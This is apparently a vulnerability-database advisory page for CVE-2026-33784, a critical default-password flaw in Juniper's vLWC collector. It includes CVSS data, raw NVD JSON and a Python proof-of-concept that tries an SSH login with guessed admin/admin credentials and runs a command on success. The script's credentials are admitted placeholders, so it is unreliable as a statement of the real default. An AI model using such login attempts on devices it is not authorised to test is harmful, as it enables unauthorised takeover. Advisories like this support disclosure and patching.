Security Vulnerability Report
CVE-2026-33784 CVSS 9.8 CRITICAL

Published: 2026-04-09 22:16:28
Last Modified: 2026-04-13 15:02:28

Description

A Use of Default Password vulnerability in the Juniper Networks Support Insights (JSI) Virtual Lightweight Collector (vLWC) allows an unauthenticated, network-based attacker to take full control of the device. vLWC software images ship with an initial password for a high privileged account. A change of this password is not enforced during the provisioning of the software, which can make full access to the system by unauthorized actors possible. This issue affects all versions of vLWC before 3.0.94.

CVSS Details

CVSS Score: 9.8
Severity: CRITICAL
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

vLWC < 3.0.94

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import paramiko


def check_vuln(target_ip, port=22):
    """
    PoC for CVE-2026-33784: Default Password Vulnerability in Juniper vLWC.
    Attempts to login using default credentials.
    Note: Replace default_user and default_pass with actual credentials if known.
    Common defaults might be admin/admin or root/password.
    """
    # Common default credentials placeholder
    default_user = "admin"
    default_pass = "admin"

    # Initialize SSH client (AutoAddPolicy accepts unknown host keys without verification)
    client = paramiko.SSHClient()
    client.set_missing_host_key_policy(paramiko.AutoAddPolicy())

    try:
        print(f"[*] Attempting connection to {target_ip}:{port}...")

        # Attempt login with default credentials
        client.connect(target_ip, port=port, username=default_user,
                       password=default_pass, timeout=5)

        print(f"[+] SUCCESS: Logged in with {default_user}:{default_pass}")
        print("[+] Device is vulnerable to CVE-2026-33784")

        # Example command execution to verify control
        stdin, stdout, stderr = client.exec_command('whoami')
        output = stdout.read().decode().strip()
        print(f"[+] Current user: {output}")
        return True

    except paramiko.AuthenticationException:
        print("[-] Failed to authenticate. Credentials may be changed or incorrect.")
        return False
    except Exception as e:
        print(f"[-] Connection error: {e}")
        return False
    finally:
        # Always release the SSH session, including on failure paths
        client.close()


if __name__ == "__main__":
    target = "192.168.1.1"  # Replace with target IP
    check_vuln(target)

References

https://kb.juniper.net/JSA107871

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-33784", "sourceIdentifier": "[email protected]", "published": "2026-04-09T22:16:27.820", "lastModified": "2026-04-13T15:02:27.760", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "A Use of Default Password vulnerability in the Juniper Networks \n\nSupport Insights (JSI) \n\nVirtual Lightweight Collector (vLWC) allows an unauthenticated, network-based attacker to take full control of the device.\n\nvLWC software images ship with an initial password for a high privileged account. A change of this password is not enforced during the provisioning of the software, which can make full access to the system by unauthorized actors possible.This issue affects all versions of vLWC before 3.0.94."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:L/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:Y/R:U/V:X/RE:L/U:X", "baseScore": 9.3, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "LOW", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", 
"modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "YES", "Recovery": "USER", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "LOW", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-1393"}]}], "references": [{"url": "https://kb.juniper.net/JSA107871", "source": "[email protected]"}]}}